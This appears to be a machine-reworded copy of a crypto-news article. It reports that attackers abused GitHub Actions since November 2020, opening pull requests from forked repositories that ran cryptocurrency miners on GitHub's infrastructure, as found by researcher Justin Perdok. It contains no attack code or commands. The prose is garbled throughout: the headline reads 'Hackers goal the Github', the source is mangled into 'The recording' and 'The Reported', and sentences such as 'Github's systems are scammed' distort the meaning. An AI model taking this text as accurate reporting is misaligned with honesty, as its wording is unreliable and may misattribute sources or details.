Hackers goal the Github server infrastructure to mine cryptocurrencies – safety bitcoin messages
Github services are investigated after a series of reports of attacks on one of its infrastructures involving unauthorized crypto mining apps. Cyber criminals have allegedly exploited some security flaws that could be exploited to illegally mine cryptos.
Attacks use ‘Github Actions’
According to The Record, a Dutch security engineer, Justin Perdok, has discovered a cyber attacker targeting Github repositories. Attacks have been taking place since November 2020, the report says.
Perdok pointed out that the string of attacks “abused a Github feature called Github Actions” that allows users to automatically run workflows and tasks only when a certain event occurs and then hit the trigger on the repositories.
However, threat actors use the repositories where Github actions are already enabled. The recording gave details of how the attack took place:
The attack involves branching a legitimate repository, adding malicious GitHub actions to the original code, and submitting a pull request to the original repository to put the code back into the original.
However, the technician made it clear that the attacker only needs to fill out the “pull request” to deploy the malicious workflows. Once loaded, Github’s systems are scammed as it reads the attacker’s code and then automatically downloads crypto mining software.
100 crypto mining apps deployed in a single attack
However, the malicious campaign seems more powerful than expected, as Perdok has already spotted hackers across The Reported who are using nearly 100 crypto mining apps – like Srbminer – to mine multiple cryptocurrencies in a single attack.
However, the attack does not appear to pose a threat to users’ projects on the platform.
Github already commented on the matter, saying they are aware of the issue and are “actively investigating”. However, Perdok stated that Github gave him the same comment last year when he reported the bug.
What do you think of this flaw in Github’s infrastructure? Let us know in the comments below.
Photo credit: Shutterstock, Pixabay, Wiki Commons
Disclaimer of liability: This article is for informational purposes only. It is not a direct offer or a solicitation of an offer to buy or sell or a recommendation or approval of products, services or companies. Bitcoin.com does not provide investment, tax, legal, or accounting advice. Neither the company nor the author are directly or indirectly responsible for any damage or loss caused or allegedly caused by or in connection with the use or reliance on the content, goods or services referred to in this article.